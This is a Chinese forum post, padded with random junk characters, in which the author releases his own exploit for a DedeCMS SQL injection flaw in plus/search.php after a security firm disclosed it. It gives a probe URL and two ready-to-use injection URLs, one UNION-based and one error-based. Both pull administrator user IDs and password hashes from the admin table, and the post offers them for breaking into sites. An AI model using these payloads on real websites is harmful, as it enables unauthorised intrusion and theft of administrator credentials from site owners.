转载不加作者名的没JJ3 r! c; c' h( E6 c2 N
% s- R! ` k. a, F& d2 C
哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站 放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。
# T2 |$ l8 t: m2 C- c) t2 s
7 T2 i* b- h0 L1 b既然已经发出来了,我就把我自己搞的exp发下吧。。唉。
. p6 j9 B! q# P$ X- ]. R: A
( j0 q" a' T5 F( {我一般是这样测试的:& {( W6 E; g9 U
/ I9 x+ N' T3 ~3 H0 X
提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a$ y9 O1 q F- o8 j9 w: h" V
# ? t0 Z4 S, c; t# _
转载不加作者名的没JJ
, M6 l- i. b3 n% F8 g* s) T" O5 v" ^# N2 x+ A. p6 G D8 g
作者:鬼哥
9 D) z. f& b7 J: p. E0 S& J: {0 x- Q& V/ W# l( H& Z1 ?- _5 C) U% ^" q9 F8 d
, t+ m+ i. x4 Z3 u+ e# z, M8 @+ G1 y
% V/ K0 ^! ^8 L看结果如果提示
3 S: O V( Y9 j9 h9 l
8 q; R3 U# r9 ?. Y' NSafe Alert: Request Error step 2 !# M* C, a" A+ L4 W
7 M+ b: G/ \& L6 h那么直接用下面的exp0 ~* p. A9 S8 F! _& T- T5 I
7 r/ K# h* j& Z
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a
" {5 d4 Z* F$ u+ G# n3 V; `4 @8 _8 e; w% f" y; r3 K
) `: J* P, M7 k9 |: c G
看结果如果提示
+ Q4 K Y" D4 }* ^: E1 s# _2 `* H, L' U: g! t4 [5 Z0 p/ C
Safe Alert: Request Error step 1 !
' i) q2 P/ \9 e% I+ C; V- h, n. L" Y) n/ e c6 w
那么直接用下面的exp Q6 |# ]& n% Y. H
' B0 i; s. V6 D8 b
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a
1 K5 v2 c3 N% K4 |" V6 y8 s8 t
' A* G/ u" c1 ?! Q8 K7 M
6 ~& c; h: Q( l3 G1 [1 u如果正常显示证明漏洞不存在了。! s& k1 E6 W5 M% B
- [/ V0 F7 O% X" W/ ^2 i
转载不加作者名的没JJ |